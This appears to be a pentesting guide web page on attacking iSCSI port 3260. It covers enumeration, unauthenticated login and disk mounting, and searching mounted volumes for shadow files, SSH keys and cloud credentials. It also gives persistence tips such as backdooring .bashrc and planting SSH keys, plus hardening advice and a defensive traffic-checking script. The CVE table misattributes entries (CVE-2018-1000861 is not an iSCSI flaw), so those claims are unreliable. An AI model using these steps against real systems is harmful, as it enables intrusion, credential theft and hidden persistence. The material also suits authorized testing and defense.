# iScsi - Port 3260

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://shop.verylazytech.com/) for e-books and courses. 📚

{% endtab %}
{% endtabs %}

## What is iSCSI and Why is it Important?

**iSCSI (Internet Small Computer Systems Interface)** is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in **SAN (Storage Area Network)** environments for **centralized disk management** and **remote storage access**.

#### Why iSCSI Matters in Security:

* **High-value targets**: iSCSI often connects to critical infrastructure like databases and VMs.
* **Misconfigurations** can lead to **unauthenticated access** or **credential leaks**.
* **Exposed iSCSI services** can reveal disk images, file systems, and even credentials.

***

## How iSCSI Works on Port 3260

Port **3260** handles the **iSCSI target communication**, where:

* **Initiators** (clients) request access to storage blocks.
* **Targets** (servers) expose storage resources via Logical Unit Numbers (LUNs).

#### iSCSI Protocol Flow:

1. **Session Initiation** via iSCSI login.
2. **Discovery Phase**: Client requests list of available targets.
3. **Authentication**: Optional but often skipped or weakly implemented.
4. **Data Transfer**: SCSI commands are encapsulated in TCP/IP.

***

## Top Vulnerabilities in iSCSI

Below are common attack vectors in iSCSI deployments:

| Vulnerability                | Description                                                    |
| ---------------------------- | -------------------------------------------------------------- |
| **No Authentication**        | Default config allows any initiator to access targets.         |
| **Weak CHAP Credentials**    | Often reused or stored in plaintext.                           |
| **Information Disclosure**   | Target names, volume names, and paths can leak sensitive info. |
| **Exposure to the Internet** | Misconfigured firewalls or open 3260 ports.                    |
| **Unpatched CVEs**           | Older storage devices may run vulnerable firmware.             |

***

## Enumeration Techniques with Tools (Nmap, Netcat, etc.)

#### Using Nmap

```bash
nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info
```

* **`-p 3260`**: Scan the iSCSI port
* **`--script=iscsi-info`**: Attempts to extract target name and LUNs

#### Netcat for Banner Grabbing

```bash
nc <target-ip> 3260
```

* You may get a raw iSCSI response showing protocol version or session response, but most targets stay silent until the initiator sends a valid Login Request PDU, so an open connection with no banner still confirms the service is listening.

#### iscsiadm (Linux)

```bash
iscsiadm -m discovery -t sendtargets -p <target-ip>
```

* Lists available iSCSI targets.
* Works only if no auth is required or credentials are known.

***

## Manual Exploitation: Hands-On Examples

### Step 1: Target Discovery

```bash
iscsiadm -m discovery -t sendtargets -p 10.10.10.22
```

Output:

```
10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1
```

### Step 2: Login Without Authentication

```bash
iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login
```

If successful, the system will map the remote disk locally (e.g., `/dev/sdb`).

### Step 3: Mount and Explore

```bash
fdisk -l
mount /dev/sdb1 /mnt
ls /mnt
```

Look for:

* `/etc/shadow` files
* Password backups
* SSH keys
* Configs containing internal IPs

***

## Automated Exploitation with Tools

### Metasploit iSCSI Modules

Metasploit has auxiliary modules for discovery:

```bash
msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run
```

### Nikto (Limited)

While **Nikto** isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.

### Custom Python Script Example

```python
import socket

target = "10.10.10.22"
port = 3260

# A real iSCSI target never sends a banner and silently ignores or drops input
# that is not a valid 48-byte PDU header, so this probe only confirms that the
# port accepts a TCP connection. The timeout matters: without it, recv() blocks
# forever on a silent target.
with socket.create_connection((target, port), timeout=5) as s:
    s.sendall(b"InitiatorHello")
    try:
        data = s.recv(1024)
        print(data if data else b"<target closed the connection>")
    except socket.timeout:
        print("no reply within 5s (expected behaviour for an iSCSI target)")
```

***

## Real-World CVEs and Notable Exploits

| CVE ID               | Description                                                 | Link                                                     |
| -------------------- | ----------------------------------------------------------- | -------------------------------------------------------- |
| **CVE-2020-2732**    | iSCSI memory leak in certain Linux kernels                  | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-2732)    |
| **CVE-2015-1420**    | iSCSI stack buffer overflow in Netgear ReadyNAS             | Exploit DB                                               |
| **CVE-2018-1000861** | Remote command execution via iSCSI web management interface | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000861) |

***

## Privilege Escalation Opportunities via this Service

Once access is gained to an iSCSI volume:

* **Look for saved credential files**
  * `.bash_history`, `.ssh/id_rsa`, `/etc/shadow`
* **Search for sudoers misconfigurations**

  ```bash
  cat /mnt/etc/sudoers
  ```
* **Enumerate LVM volumes** for hidden partitions

  ```bash
  lvscan
  ```

If LUNs expose full disk images, mount them locally and search for:

* **SAM/NTDS.dit (Windows)**
* **MySQL databases**
* **AWS credentials**

***

## Post-Exploitation Tips and Persistence

#### Techniques:

* **Leave a backdoor in iSCSI shared volume**
  * e.g., `.bashrc` modification
* **Enable remote access via hidden SSH key**
  * Inject key into `/home/user/.ssh/authorized_keys`
* **Exfiltrate disk image for offline cracking**

  ```bash
  dd if=/dev/sdb of=disk.img bs=1M
  ```

***

## Defense, Mitigation, and Hardening Techniques

#### Best Practices:

* **Always enable CHAP authentication**
* **Whitelist initiator IPs**
* **Limit access with firewall rules (block 3260 externally)**
* **Use VLANs or separate subnets for SAN traffic**
* **Regularly patch iSCSI daemons and firmware**

#### Monitoring Tips:

* Use **Wireshark** to inspect unauthorized iSCSI sessions.
* Set up **Syslog alerts** for unusual discovery requests.
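As an added example (not code from the original page), the following Python builds the Login Request PDU from the protocol flow section above and decodes it the way a traffic monitor would, then applies the CHAP and initiator-allowlist checks from the hardening list to produce the kind of findings the monitoring tips call for. The initiator names, ISID and allowlist are constructed assumptions, not values from any real deployment.

```python
"""Added example (not code from the original page): build an iSCSI Login Request
PDU per RFC 7143, decode it as a monitor would, and apply defender checks."""
import struct

OPCODE_LOGIN_REQUEST = 0x03
ALLOWED_INITIATORS = {"iqn.2023-01.local.lab:initiator.app01"}  # constructed allowlist


def build_login_request(params: dict, isid: bytes = b"\x00\x02\x3d\x00\x00\x01") -> bytes:
    """48-byte Basic Header Segment followed by NUL-terminated key=value text."""
    text = b"".join(f"{k}={v}".encode() + b"\x00" for k, v in params.items())
    flags = 0x80 | (0 << 2) | 1       # Transit=1, CSG=SecurityNegotiation, NSG=LoginOperational
    bhs = bytes([0x40 | OPCODE_LOGIN_REQUEST, flags, 0x00, 0x00])  # Immediate|opcode, flags, Version-max/min
    bhs += b"\x00" + len(text).to_bytes(3, "big")  # TotalAHSLength, 24-bit DataSegmentLength
    bhs += isid + b"\x00\x00"                      # ISID, TSIH=0 means a new session
    bhs += struct.pack(">IHHII", 1, 0, 0, 1, 0)    # ITT, CID, reserved, CmdSN, ExpStatSN
    bhs += b"\x00" * 16                            # bytes 32-47 reserved
    return bhs + text + b"\x00" * ((-len(text)) % 4)   # data segment is 4-byte aligned


def parse_login_request(pdu: bytes) -> dict:
    """Extract the header fields and negotiation keys a monitor cares about."""
    if len(pdu) < 48:
        raise ValueError("PDU shorter than the 48-byte BHS")
    opcode = pdu[0] & 0x3F                         # bit 6 is the Immediate flag
    if opcode != OPCODE_LOGIN_REQUEST:
        raise ValueError(f"not a Login Request (opcode 0x{opcode:02x})")
    data_len = int.from_bytes(pdu[5:8], "big")
    pairs = pdu[48:48 + data_len].split(b"\x00")
    return {
        "transit": bool(pdu[1] & 0x80),
        "csg": (pdu[1] >> 2) & 0x3,                # current stage
        "nsg": pdu[1] & 0x3,                       # next stage, 3 = FullFeaturePhase
        "isid": pdu[8:14].hex(),
        "tsih": struct.unpack(">H", pdu[14:16])[0],
        "params": dict(p.decode().split("=", 1) for p in pairs if b"=" in p),
    }


def login_findings(req: dict) -> list:
    """Checks matching the hardening list: require CHAP, allowlist initiators, watch discovery."""
    p = req["params"]
    name = p.get("InitiatorName")
    findings = []
    if "CHAP" not in p.get("AuthMethod", "None").split(","):   # RFC default is None
        findings.append("no CHAP offered")
    if name not in ALLOWED_INITIATORS:
        findings.append(f"initiator not allowlisted: {name}")
    if p.get("SessionType") == "Discovery" and name not in ALLOWED_INITIATORS:
        findings.append("discovery request from unknown initiator")
    return findings
```

Feeding `login_findings` the first PDU of every new TCP session on 3260 (for example from a capture) gives a list that is empty for expected initiators and non-empty for the unauthenticated or unknown logins the monitoring tips want alerted.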

***

## 📚 Recommended Books

#### [The Hacker Playbook 3: Practical Guide To Penetration Testing](https://shop.verylazytech.com/l/TheHackerPlaybook3)

> A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.

***

